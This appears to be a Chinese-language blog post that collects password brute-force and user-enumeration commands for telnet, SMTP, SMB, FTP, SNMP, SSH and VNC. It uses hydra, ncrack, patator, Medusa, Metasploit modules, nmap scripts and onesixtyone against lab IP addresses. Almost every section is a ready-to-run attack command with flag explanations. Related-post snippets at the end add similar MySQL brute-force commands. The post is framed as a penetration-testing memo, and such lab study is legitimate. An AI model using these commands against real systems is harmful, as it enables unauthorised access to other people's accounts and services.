hydra、ncrack、patator、Metasploit 和 Medusa,爆破:telnet、SMTP、SMB、FTP、

最新推荐文章于 2024-06-15 09:18:11 发布
最新推荐文章于 2024-06-15 09:18:11 发布
阅读量2.9k 收藏 12
点赞数 1
分类专栏: 漏洞利用 Linux kali 文章标签: hydra msf ncrack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46236101/article/details/115497507
版权
kali 同时被 3 个专栏收录
11 篇文章 0 订阅
订阅专栏
漏洞利用
8 篇文章 0 订阅
订阅专栏
Linux
4 篇文章 0 订阅
订阅专栏

本文对常见的系统服务的认证系统进行攻击尝试的方式做了汇总,使用到的工具主要包括 hydra、ncrack、patator、Metasploit 和 Medusa,这些工具默认在 kali 上已经安装,可以直接使用,本文主要涉及的服务包括:telnet、SMTP、SMB、FTP、SNMP、SSH、VNC,关于工具的介绍和服务的介绍未进行讲解,需自行查阅资料进行了解。

telnet

hydra

hydra –L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106 telnet

-L 指定用户名列表

-P 指定密码列表

图片

Ncrack

ncrack –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106:23

-U 指定用户名列表

-P 指定密码列表

图片

Patator

patator telnet_login host=192.168.1.106 inputs=‘FILE0\nFILE1’ 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re=‘Username: | Password:’

图片

Metasploit

use auxiliary/scanner/telnet/telnet_loginmsf exploit (telnet_login)>set rhosts 192.168.1.106 (IP of Remote Host)msf exploit (telnet_login)>set user_•le /root/Desktop/user txtmsf exploit (telnet_login)>set pass_•le /root/Desktop/pass.txtmsf exploit (telnet_login)>set stop_on_success truemsf exploit (telnet_login)> exploit

图片

SMTP 

telent

连接 25 端口:

telnet 192.168.1.107 25

枚举用户,结果返回 550 则表示用户不存在,结果返回 250,251,252 表示用户是有效的:

vrfy raj@mail.lab.ignite

图片

Metasploit

use auxiliary/scanner/smtp/smtp_enummsf auxiliary(smtp_enum) > set rhosts 192.168.1.107msf auxiliary(smtp_enum) > set rport 25msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txtmsf auxiliary(smtp_enum) > exploit

图片

smtp-user-enum

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107

-M 指定使用哪种方式枚举,比如 EXPN, VRFY 或 RCPT

-U 指定用户名列表

-t 指定目标主机 IP

图片

指定邮箱后缀,用户名列表只需要名字即可,使用参数 -D:

smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107

图片

iSMTP

ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt

图片

SMB

Hydra

hydra –L/root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 smb

图片

Ncrack

ncrack –u /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 –p 445

图片

Medusa

medusa -h 192.168.1.118 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M smbnt

图片

Metasploit​​​​​​​

use auxiliary/scanner/smb/smb_loginmsf exploit (smb_login)>set rhost 192.168.1.118msf exploit (smb_login)>set user_•le /root/Desktop/user.txtmsf exploit (smb_login)>set pass_•le /root/Desktop/pass.txtmsf exploit (smb_login)>set stop_on_success truemsf exploit (smb_login)>exploit

图片

FTP 

Hydra

hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103 ftp

图片

Ncrack

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.103:21

图片

Medusa

Medusa -h 192.168.1.103 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M ftp

图片

Patator

patator ftp_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt

图片

Metasploit

 

use auxiliary/scanner/ftp/ftp_login
msf exploit (ftp_login)>set rhosts 192.168.1.103 (IP of Remote Host)msf exploit (ftp_login)>set user_•le /root/Desktop/user.txtmsf exploit (ftp_login)>set userpass_•le /root/Desktop/pass.txtmsf exploit (ftp_login)>set stop_on_success truemsf exploit (ftp_login)> exploit

图片

SNMP 

Hydra

hydra -P /root/Desktop/pass.txt 192.168.1.125 snmp

图片

Medusa

medusa -M snmp –h 192.168.1.125 –u ignite –P /root/Desktop/pass.txt

图片

Metasploit

use auxiliary/scanner/snmp/snmp_loginmsf auxiliary(scanner/snmp/snmp_login)> set rhosts 192.168.1.125 (IP of Remote Host)msf auxiliary(scanner/snmp/snmp_login)> set pass_•le /root/Desktop/pass.txtmsf auxiliary(scanner/snmp/snmp_login)> set stop_on_success true msf auxiliary(scanner/snmp/snmp_login)> run

图片

Nmap

nmap –sU –p 161 –n –script snmp-brute 192.168.1.125 –script-args snmp- brute.communitiesdb=/root/Desktop/pass.txt

图片

Onesixtyone

onesixtyone 192.168.1.125 –c /root/Desktop/pass.txt

图片

SSH

Hydra

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.103 ssh

图片

Medusa

medusa -h 192.168.1.103 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M ssh

图片

Ncrack

ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103:22

图片

Patator

patator ssh_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt

图片

Metasploit

use auxiliary/scanner/ssh/ssh_loginmsf exploit (ssh_login)>set rhosts 192.168.1.103 (IP of Remote Host)msf exploit (ssh_login)>set user_•le /root/Desktop/user.txtmsf exploit (ssh_login)>set pass_•le /root/Desktop/pass.txtmsf exploit (ssh_login)>exploit

图片

VNC

Hydra

Hydra-s 5900 –P /root/Desktop/pass.txt –t 16 192.168.0.6 vnc

图片

Metasploit

use auxiliary/scanner/vnc/vnc_loginmsf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6msf auxiliary(scanner/vnc/vnc_login) > set pass_•le /root/Desktop/pass.txtmsf auxiliary(scanner/vnc/vnc_login) > run

图片

Patator

patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!=‘Authentication failure’ –max-reteries 0 –x quit:code=0

图片

Medusa

Medusa -h 192.168.0.6 –u root–P /root/Desktop/pass.txt –M vnc

图片

Ncrack

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.0.6:5900

图片

总结

整体来看,这些工具可以对除了以上几种服务攻击之外,还可以对其他更多的服务进行攻击尝试,比如数据库服务中的 mssql、mysql、oracle 等,差异仅仅在于参数不同,这里主要做个备忘,以备不时之需,没啥技术含量,仅供参考。

扶苏゜
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali网络安全终极教程
07-05
1、本课程着重分享Kali Linux渗透测试从基础学习到实战操作教程!2、本课程致力于帮助学员学习、Kali Linux环境搭建、系统操作及其实战技巧!
6-13漏洞利用-smtp暴力破解
山兔的博客
07-22 3296
medusa是一款用来破解不同协议用户名和密码的专用软件。
Python武器库开发-武器库篇之SMB服务暴力破解(五十五)
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-15 1203
SMB服务(Server Message Block)是一种用于文件共享、打印机共享和其他资源共享的网络协议。它最初由IBM开发,后来被微软广泛采用。SMB服务允许多台计算机在网络上共享文件和资源,从而实现文件的读取、写入和共享。通过SMB服务,用户可以访问其他计算机上的文件、打印机、文件夹和其他共享资源,就像访问本地资源一样。SMB服务还提供了许多功能和特性,如权限控制、文件锁定、文件和目录的远程操作等。
smtp渗透
m0_46689007的博客
11-30 2965
我们可以透过协议,指定了一条消息发送至一个或多个接收者,然后消息文本会被传输。例如,他们可以向财务部门发送一封看似来自 CFO 的令人信服的电子邮件,并紧急要求向攻击者的账户进行大笔银行转账。电子邮件库将这些地址转换为 RCPT TO 命令,并将邮件不仅发送给预期的收件邮箱,还发送给这些额外构造的收件邮箱。用于利用邮件服务器和网络邮件应用程序,这些应用程序根据用户提供的未正确过滤的输入构造恶意SMTP 语句,将攻击者控制的 SMTP 命令注入从应用程序传输到 SMTP 服务器的数据中,以发送垃圾邮件。
爆破smtp服务Metasploittable2
边城浪子的博客
09-16 2067
实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:Metasploittable2 ip:192.168.172.129 攻击过程: step1:使用medusa爆破 medusa -h 192.168.172.129 -u msfadmin -P /root/Desktop/password.txt -M smtp ...
web渗透测试----5、暴力破解漏洞--(3)FTP密码破解
七天
06-23 1676
FTP暴力破解
hydra强大的爆破工具,支持多种协议
05-05
hydra支持POP3,SMB,RDP、SSH,FTP,POP3,Telnet,MYSQL等协议的爆破
hydra密码爆破字典压缩后120M,password压缩前386M。
03-03
hydra密码爆破字典压缩后120M,压缩前386M。下的别人的,共享出来
hydra-event-bus-plugin:用于事件总线的Hydra插件
04-27
Hydra Micro-service的事件总线 为基于Hydra的微服务提供事件总线。 安装 $ npm install -- save hydra - event - bus - plugin 设置 在服务中设置.use(new EventBusPlugin())以注册插件,然后可以使用hydra....
密码爆破DOS运行_hydra-7.3-windows.7z
02-13
暴力猜解即是穷举法,穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;...
7-FTP爆破.zip
08-11
FTP爆破工具有很多,如Hydra、Ncrack等,它们可以快速地进行大量组合尝试,以突破FTP服务器的登录验证。 在使用这个压缩包中的FTP爆破工具时,首先需要准备一个用户名字典username.dic,列出所有可能的用户名,包括...
爆破ftp视频教程
10-19
FTP爆破工具通常包括自动化脚本或专门的软件,例如Hydra、Ncrack等。这些工具能够快速地尝试大量密码组合,大大减少了手动尝试的时间。在描述中提到的"爆破ftp视频教程"可能包含如何使用这类工具的详细步骤和技巧。 ...
hydra-python-agent-gui:hydra python代理程序的GUI
05-03
它分为两部分:左侧将Hydra API显示为链接图,而右侧则具有基于API文档构建的通用控制台,可用于查询API。 前端是使用React构建的,使用代理的中间层是使用Flask构建的。 安装要求 建议您使用venv(虚拟环境): ...
hydra-examples:学习Hydra的示例和演示代码
05-06
Hydra是由创建的实时编码库。 Hydra使用JavaScript时,其结构几乎不需要任何JavaScript知识。 如果您来自另一种语言,或者是编程新手,则可以在Hydra中构建非常有趣的视觉效果。 本质上,Hydra接受输入→对其进行...
pytorch_tempest:我使用pytorch-lightning和hydra训练神经网络的仓库
05-24
所有参数和模块都在配置中定义; 事先为不同的优化器/调度器等准备配置,因此很容易在它们之间进行切换; 有用于不同深度学习任务的模板。 当前,支持图像分类和命名实体识别。 运行管道的示例:这将在MNIST上...
hydra 爆破工具
02-22
windows 版 hydra 爆破工具,仅供学习。
Patator-一款很好用的爆破工具
andiao1218的博客
10-05 3570
项目地址:https://github.com/lanjelot/patator 打开文件夹 运行一下文件查看帮助 1 python patator.py --help 这里有很多的爆破选项,就不一一截图了 试一下爆破ssh 1 root@sch01ar:/sch01ar/patator# python patator.py ssh_login host=19...
暴力破解测试工具--Patator 源码分析
Skycrab
08-03 8502
说到暴力破解大家首先想到的肯定是hydra,的确hydra的确非常强大,支持几乎所有的弱密码破解。hydra本身使用C语言开发,性能很高,很适合学习。 但今天我们使用的是Patator,Patator本身使用Python开发,最新版本也就4000行左右,可以说小到极致,这主要多亏了Python库的丰富和强大。 Patator下载地址: thttp://code.google.com/p/pat
[学习记录]内网应急实验——对SMB协议弱口令爆破事件进行日志分析
渗透为止的博客
04-14 476
SMB协议弱口令爆破事件进行日志分析
Kali系列之Hydra/Medusa mysql密码爆破
05-13
HydraMedusa是常用的密码爆破工具,可以用于测试弱密码。这里以MySQL为例进行演示。 首先,安装HydraMedusa。在Kali Linux中,可以使用以下命令安装: ``` sudo apt-get install hydra sudo apt-get install medusa ``` 然后,使用HydraMedusa进行MySQL密码爆破。以下是使用Hydra的命令示例: ``` hydra -L username.txt -P password.txt mysql://ip_address ``` 其中,`username.txt`和`password.txt`分别是用户名和密码的字典文件,`ip_address`是目标MySQL服务器的IP地址。执行该命令后,Hydra将尝试使用字典文件中的用户名和密码进行爆破。 另外,以下是使用Medusa的命令示例: ``` medusa -h ip_address -U username.txt -P password.txt -M mysql ``` 其中,`ip_address`是目标MySQL服务器的IP地址,`username.txt`和`password.txt`分别是用户名和密码的字典文件,`-M mysql`指定使用MySQL协议进行爆破。执行该命令后,Medusa将尝试使用字典文件中的用户名和密码进行爆破。 需要注意的是,在进行密码爆破测试时,需要获得授权并遵守法律法规,不得用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值